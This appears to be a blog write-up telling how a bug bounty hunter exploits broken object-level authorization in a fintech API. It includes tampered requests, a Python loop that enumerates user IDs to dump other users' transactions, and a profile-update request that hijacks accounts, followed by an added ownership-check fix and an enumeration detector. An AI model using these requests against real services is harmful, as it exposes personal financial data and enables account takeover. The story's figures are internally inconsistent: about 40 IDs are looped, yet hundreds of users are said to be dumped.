Hacking a Fintech App via Broken API Authorization
- Trung Le

- Jul 26
It started with a simple curiosity.
A bug bounty hunter known as RedFox registered an account on a trendy fintech app called FinCash. The platform allowed users to manage their e-wallets and track payments via a sleek mobile app powered by a modern RESTful API.
After intercepting a request with Burp Suite, RedFox noticed something.
🔴 Request to fetch personal transactions
GET /api/v1/users/48392/transactions HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUz...
Nothing unusual… until RedFox changed the user ID in the URL:
🔴 Tampered Request
GET /api/v1/users/48393/transactions HTTP/1.1
Authorization: Bearer eyJhbGciOiJIUz...
The API returned data — without validating whether the requester owned user ID 48393. RedFox had discovered a BOLA (Broken Object Level Authorization) vulnerability: the API authenticated the caller but never checked that the caller was allowed to access the specific object named in the URL.
Step-by-Step Exploitation
🔴 Reconnaissance
RedFox used a Python script to loop through user IDs and extract all available transaction records.
    import requests

    token = "<RedFox's own bearer token>"  # placeholder; the post only shows a truncated value

    # Walk a range of user IDs with a single account's token; any 200 means the
    # API served another user's records without an ownership check.
    for i in range(48390, 48430):
        url = f"https://fincash.app/api/v1/users/{i}/transactions"
        headers = {"Authorization": f"Bearer {token}"}
        r = requests.get(url, headers=headers)
        if r.status_code == 200:
            print(f"User {i} =>", r.json())
Within an hour, RedFox had dumped transaction data for hundreds of users, including account balances, timestamps, and transaction IDs.
🔴 Escalation
RedFox got bolder. What if the update API also lacked object-level checks?
🔴 Request to update phone number
PUT /api/v1/users/48392/profile
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUz...
{
"phone": "+12025551234"
}
He changed the user ID.
🔴 Malicious Request
PUT /api/v1/users/48394/profile
{
"phone": "+19998887777"
}
It worked. RedFox could hijack accounts silently — change their phone numbers, reset passwords, or intercept OTPs.
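As an added illustration, not part of the original post: the object-level check that FinCash's two handlers were missing, written in Python against an in-memory store, plus a log heuristic that flags the enumeration pattern of the script above (one token reading many distinct user IDs). The handler signatures, the access-log format and the sample log lines are assumptions for this example.

```python
from collections import defaultdict
import re

# Constructed in-memory store standing in for FinCash's database.
TRANSACTIONS = {48392: ["txn-1", "txn-2"], 48393: ["txn-9"], 48394: []}
PROFILES = {48392: {"phone": "+12025551234"}, 48394: {"phone": "+15550000000"}}


def get_transactions(auth_user_id, path_user_id):
    """GET /api/v1/users/<id>/transactions with the missing BOLA check.
    auth_user_id is the subject of the already-verified bearer token;
    path_user_id is the object named in the URL. They must match."""
    if auth_user_id != path_user_id:
        return 403, None  # or 404, so the response does not confirm the ID exists
    return 200, TRANSACTIONS.get(path_user_id, [])


def update_profile(auth_user_id, path_user_id, body):
    """PUT /api/v1/users/<id>/profile: same ownership rule before any write."""
    if auth_user_id != path_user_id:
        return 403, None
    PROFILES.setdefault(path_user_id, {}).update(body)
    return 200, PROFILES[path_user_id]


# Detection side: the post's loop shows one token walking consecutive IDs.
# Assumed access-log format: "token=<token id or hash> <METHOD> <path> <status>".
LOG_RE = re.compile(r"token=(\S+) (GET|PUT) /api/v1/users/(\d+)/")


def find_enumerators(log_lines, threshold=5):
    """Return {token: distinct_user_ids} for tokens touching >= threshold IDs."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m:
            seen[m.group(1)].add(int(m.group(3)))
    return {tok: len(ids) for tok, ids in seen.items() if len(ids) >= threshold}


SAMPLE_LOG = [  # constructed lines, not real FinCash logs
    "token=tokA GET /api/v1/users/48390/transactions 200",
    "token=tokA GET /api/v1/users/48391/transactions 200",
    "token=tokA GET /api/v1/users/48392/transactions 200",
    "token=tokA GET /api/v1/users/48393/transactions 200",
    "token=tokB GET /api/v1/users/48392/transactions 200",
    "token=tokB PUT /api/v1/users/48392/profile 200",
]
```

In a real service the ownership comparison belongs in one shared authorization layer, so a new route cannot forget it the way both of FinCash's routes did.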
Impact
- PII of 500+ users was exposed.
- Several accounts were hijacked before the company detected anomalies.
- FinCash was delisted temporarily from app stores pending a security audit.